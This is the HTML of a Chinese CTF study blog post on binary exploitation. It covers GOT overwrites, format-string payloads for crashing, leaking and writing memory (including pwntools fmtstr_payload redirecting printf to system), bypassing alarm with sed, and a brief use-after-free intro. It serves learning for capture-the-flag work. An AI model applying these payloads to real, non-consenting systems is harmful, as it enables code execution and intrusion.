<h2 id="覆盖got表攻击"><a href="#覆盖got表攻击" class="headerlink" title="覆盖got表攻击"></a>覆盖got表攻击</h2><p>只要把一个函数got表的值修改成其他函数</p>
<p>比如说把puts函数got表的值修改成system，执行puts就会变成执行system</p>
<h2 id="格式化字符串攻击"><a href="#格式化字符串攻击" class="headerlink" title="格式化字符串攻击"></a>格式化字符串攻击</h2><h3 id="使程序崩溃"><a href="#使程序崩溃" class="headerlink" title="使程序崩溃"></a>使程序崩溃</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload = <span class="string">&#x27;%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%&#x27;</span></span><br></pre></td></tr></table></figure>

<p>只要%s足够多，栈上没有值可以打印，程序就崩溃了</p>
<h3 id="求偏移值"><a href="#求偏移值" class="headerlink" title="求偏移值"></a>求偏移值</h3><ul>
<li>手动：AAAA%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p</li>
</ul>
<p>​			看看泄露出来哪一个对应了AAAA(0x41414141)</p>
<ul>
<li><p>gdb数</p>
</li>
<li><p>pwngdb：fmtarg + 栈帧地址</p>
</li>
</ul>
<p>fmtstr_payload是pwntools里面的一个工具，用来简化对格式化字符串漏洞的构造工作</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">exec_fmt</span>(<span class="params">payload</span>):</span><br><span class="line">    io = process(<span class="string">&#x27;./fmt2&#x27;</span>)</span><br><span class="line">    io.sendline(payload)</span><br><span class="line">    info = io.recv()</span><br><span class="line">    <span class="keyword">return</span> info</span><br><span class="line"></span><br><span class="line">auto = FmtStr(exec_fmt)</span><br><span class="line">offset = auto.offset</span><br><span class="line"></span><br><span class="line">payload = fmtstr_payload(offset, &#123;printf_got: system_addr&#125;)</span><br></pre></td></tr></table></figure>



<h3 id="泄露任意地址内存"><a href="#泄露任意地址内存" class="headerlink" title="泄露任意地址内存"></a>泄露任意地址内存</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">payload = p32(addr) + <span class="string">&#x27;%n$x&#x27;</span>	<span class="comment">#addr是覆盖的地址，n是输出格式，x是偏移值</span></span><br><span class="line">payload = p64(addr) + <span class="string">&#x27;%n$x&#x27;</span></span><br></pre></td></tr></table></figure>

<p>​	%n可以为%x、%p、%s</p>
<p>​	利用 %x和%p 来获取对应栈的存储的内存地址，但建议使用 %p，可以不用考虑位数的区别</p>
<p>​	利用 %s 来获取地址所对应的内容，只不过有零截断</p>
<h3 id="覆盖任意地址内存"><a href="#覆盖任意地址内存" class="headerlink" title="覆盖任意地址内存"></a>覆盖任意地址内存</h3><h4 id="覆盖小数字"><a href="#覆盖小数字" class="headerlink" title="覆盖小数字"></a>覆盖小数字</h4><p>覆盖4（32位）或8（64位）以下的数字</p>
<p>把 地址 写在后面</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload = <span class="string">&#x27;aa%8$nxx&#x27;</span> + p32(a_addr)</span><br></pre></td></tr></table></figure>

<p>前面两个a说明要填充2</p>
<p>后面两个x是填充字符，让前面的字符数凑满 4 或 8 的倍数</p>
<h4 id="覆盖大数字"><a href="#覆盖大数字" class="headerlink" title="覆盖大数字"></a>覆盖大数字</h4><p>%n	一下子写入4个字节</p>
<p>%hn	一下子写入2个字节的内容，写入的是双字节</p>
<p>%hhn	一下子写入1个字节的内容，写入的是单字节</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#例如覆盖成0x12345678</span></span><br><span class="line">payload = p32(b_addr)+p32(b_addr+<span class="number">1</span>)+p32(b_addr+<span class="number">2</span>)+p32(b_addr+<span class="number">3</span>)</span><br><span class="line">payload += <span class="string">&#x27;%104x&#x27;</span>+<span class="string">&#x27;%6$hhn&#x27;</span>+<span class="string">&#x27;%222x&#x27;</span>+<span class="string">&#x27;%7$hhn&#x27;</span>+<span class="string">&#x27;%222x&#x27;</span>+<span class="string">&#x27;%8$hhn&#x27;</span>+<span class="string">&#x27;%222x&#x27;</span>+<span class="string">&#x27;%9$hhn&#x27;</span></span><br><span class="line"><span class="number">0x78</span>		地址占了<span class="number">16</span>个字节，填充时应将地址减去第一个数为<span class="number">0x78</span>-<span class="number">0x10</span>=<span class="number">0x68</span> 即<span class="number">104</span></span><br><span class="line"><span class="number">0x56</span>		前面已经填充了<span class="number">0x78</span>个数了，我们不能直接填充<span class="number">0x56</span>，但我们可以填充<span class="number">0x156</span>，存储时只取后面两个，</span><br><span class="line">第二个数为<span class="number">0x156</span> - <span class="number">0x78</span> = <span class="number">0xDE</span> 即<span class="number">222</span></span><br><span class="line"><span class="number">0x34</span>		前面已经填充了<span class="number">0x156</span>个数了，填充<span class="number">0x234</span>，第三个数为<span class="number">0x234</span> - <span class="number">0x156</span> = <span class="number">0xDE</span> 即<span class="number">222</span></span><br><span class="line"><span class="number">0x12</span>		前面已经填充了<span class="number">0x234</span>个数了，填充<span class="number">0x312</span>，第三个数为<span class="number">0x312</span> - <span class="number">0x234</span> = <span class="number">0xDE</span> 即<span class="number">222</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">payload = p32(b_addr)+p32(b_addr+<span class="number">1</span>)+p32(b_addr+<span class="number">2</span>)+p32(b_addr+<span class="number">3</span>)</span><br><span class="line">payload += <span class="string">&#x27;%第一个数x%偏移值$hhn&#x27;</span>+<span class="string">&#x27;%第二个数x%偏移值+1$hhn&#x27;</span>+<span class="string">&#x27;%第三个数x%偏移值+2$hhn&#x27;</span>+<span class="string">&#x27;%第四个数x%偏移值+3$hhn&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#使用fmtstr</span></span><br><span class="line">payload = fmtstr_payload(offset, &#123;printf_got: system_addr&#125;)</span><br><span class="line">fmtstr_payload(offset, writes, numbwritten=<span class="number">0</span>, write_size=<span class="string">&#x27;byte&#x27;</span>)</span><br><span class="line"><span class="comment">#第一个参数表示格式化字符串的偏移；</span></span><br><span class="line"><span class="comment">#第二个参数表示需要利用%n写入的数据，采用字典形式，我们要将printf的GOT数据改为system函数地址，就写成&#123;printfGOT: systemAddress&#125;；</span></span><br><span class="line"><span class="comment">#第三个参数表示已经输出的字符个数，这里没有，为0，采用默认值即可；</span></span><br><span class="line"><span class="comment">#第四个参数表示写入方式，是按字节（byte）、按双字节（short）还是按四字节（int），对应着hhn、hn和n，默认值是byte，即按hhn写。</span></span><br><span class="line"><span class="comment">#fmtstr_payload函数返回的就是payload</span></span><br><span class="line"><span class="comment">#实际上我们常用的形式是fmtstr_payload(offset,&#123;address1:value1&#125;)</span></span><br><span class="line">例如将0804a048处改为<span class="number">0x12345678</span></span><br><span class="line">payload = fmtstr_payload(offset,&#123;<span class="number">0x804a048</span>:<span class="number">0x12345678</span>&#125;)</span><br></pre></td></tr></table></figure>

<p>由于是小端序，先覆盖的是低位数</p>
<h2 id="绕过ALARM函数"><a href="#绕过ALARM函数" class="headerlink" title="绕过ALARM函数"></a>绕过ALARM函数</h2><p>命令行修改法</p>
<p><em># 将程序名为ProgrammName中的alarm替换为isnan</em> </p>
<p>终端输入&gt;  sed -i s&#x2F;alarm&#x2F;isnan&#x2F;g .&#x2F;ProgrammName</p>
<h2 id="堆"><a href="#堆" class="headerlink" title="堆"></a>堆</h2><h3 id="UAFuse-after-free"><a href="#UAFuse-after-free" class="headerlink" title="UAF		use_after_free"></a>UAF		use_after_free</h3><p>我们知道可读可写可执行的程序是非常危险的</p>
<p>use_after_free就是让一块chunk既是数据段chunk，又是控制段chunk</p>
<p>数据段chunk，可写</p>
<p>控制段chunk，可执行</p>
<p>数据段chunk + 控制段chunk，可攻击！！！</p>
<p>比如说fastbin attack double free漏洞，即一个chunk被free两次</p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/09/29/hello-world/" rel="prev" title="Hello World">
      <i class="fa fa-chevron-left"></i> Hello World
    </a></div>
      <div class="post-nav-item">
    <a href="/2023/02/18/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/" rel="next" title="">
       <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#PWN%E9%A2%98%E7%9B%AE%E6%80%BB%E7%BB%93"><span class="nav-number">1.</span> <span class="nav-text">PWN题目总结</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#PWNTOOLS"><span class="nav-number">1.1.</span> <span class="nav-text">PWNTOOLS</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%9F%BA%E6%9C%AC%E4%BD%BF%E7%94%A8"><span class="nav-number">1.1.1.</span> <span class="nav-text">基本使用</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ELF"><span class="nav-number">1.1.2.</span> <span class="nav-text">ELF</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ROP"><span class="nav-number">1.1.3.</span> <span class="nav-text">ROP</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#LibcSearcher"><span class="nav-number">1.1.4.</span> <span class="nav-text">LibcSearcher</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#shellcode"><span class="nav-number">1.1.5.</span> <span class="nav-text">shellcode</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%BB%88%E7%AB%AF%E6%9F%A5%E6%89%BE"><span class="nav-number">1.1.6.</span> <span class="nav-text">终端查找</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%A0%88%E6%BA%A2%E5%87%BA%E9%A2%98%E7%9B%AE"><span class="nav-number">1.2.</span> <span class="nav-text">栈溢出题目</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#ret2text"><span class="nav-number">1.2.1.</span> <span class="nav-text">ret2text</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%B2%A1%E6%9C%89%E5%90%8E%E9%97%A8%E5%87%BD%E6%95%B0%E4%BD%86%E6%B2%A1%E6%9C%89%E6%89%93%E5%BC%80NX%E4%BF%9D%E6%8A%A4%E6%8E%AA%E6%96%BDshellcode"><span class="nav-number">1.2.2.</span> <span class="nav-text">没有后门函数但没有打开NX保护措施	shellcode</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%9D%99%E6%80%81%E9%93%BE%E6%8E%A5%E6%96%87%E4%BB%B6"><span class="nav-number">1.2.3.</span> <span class="nav-text">静态链接文件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8A%A8%E6%80%81%E9%93%BE%E6%8E%A5%E6%96%87%E4%BB%B6%E6%9C%89system%E5%92%8C%E2%80%9D-x2F-bin-x2F-sh%E2%80%9D%E4%BD%86%E6%98%AF%E5%88%86%E5%BC%80"><span class="nav-number">1.2.4.</span> <span class="nav-text">动态链接文件有system和”&#x2F;bin&#x2F;sh”但是分开</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8F%AA%E6%9C%89system%E6%B2%A1%E6%9C%89%E2%80%9D-x2F-bin-x2F-sh%E2%80%9D"><span class="nav-number">1.2.5.</span> <span class="nav-text">只有system没有”&#x2F;bin&#x2F;sh”</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%97%A0%E5%90%8E%E9%97%A8%E5%87%BD%E6%95%B0ret2libc"><span class="nav-number">1.2.6.</span> <span class="nav-text">无后门函数ret2libc</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%BA%A2%E5%87%BA%E5%87%BD%E6%95%B0%E7%AD%89%E4%BA%8E%E5%81%8F%E7%A7%BB%E5%80%BC%E2%80%94%E2%80%94%E6%A0%88%E8%BF%81%E7%A7%BB"><span class="nav-number">1.2.7.</span> <span class="nav-text">溢出函数等于偏移值——栈迁移</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ret2csu"><span class="nav-number">1.2.8.</span> <span class="nav-text">ret2csu</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%A0%88%E8%BF%81%E7%A7%BB"><span class="nav-number">1.2.9.</span> <span class="nav-text">栈迁移</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%A6%86%E7%9B%96got%E8%A1%A8%E6%94%BB%E5%87%BB"><span class="nav-number">1.3.</span> <span class="nav-text">覆盖got表攻击</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%94%BB%E5%87%BB"><span class="nav-number">1.4.</span> <span class="nav-text">格式化字符串攻击</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BD%BF%E7%A8%8B%E5%BA%8F%E5%B4%A9%E6%BA%83"><span class="nav-number">1.4.1.</span> <span class="nav-text">使程序崩溃</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%B1%82%E5%81%8F%E7%A7%BB%E5%80%BC"><span class="nav-number">1.4.2.</span> <span class="nav-text">求偏移值</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%B3%84%E9%9C%B2%E4%BB%BB%E6%84%8F%E5%9C%B0%E5%9D%80%E5%86%85%E5%AD%98"><span class="nav-number">1.4.3.</span> <span class="nav-text">泄露任意地址内存</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%A6%86%E7%9B%96%E4%BB%BB%E6%84%8F%E5%9C%B0%E5%9D%80%E5%86%85%E5%AD%98"><span class="nav-number">1.4.4.</span> <span class="nav-text">覆盖任意地址内存</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%A6%86%E7%9B%96%E5%B0%8F%E6%95%B0%E5%AD%97"><span class="nav-number">1.4.4.1.</span> <span class="nav-text">覆盖小数字</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%A6%86%E7%9B%96%E5%A4%A7%E6%95%B0%E5%AD%97"><span class="nav-number">1.4.4.2.</span> <span class="nav-text">覆盖大数字</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%BB%95%E8%BF%87ALARM%E5%87%BD%E6%95%B0"><span class="nav-number">1.5.</span> <span class="nav-text">绕过ALARM函数</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%A0%86"><span class="nav-number">1.6.</span> <span class="nav-text">堆</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#UAFuse-after-free"><span class="nav-number">1.6.1.</span> <span class="nav-text">UAF		use_after_free</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">s1eepstar</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">3</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">s1eepstar</span>
</div>

<!--
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>
-->

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
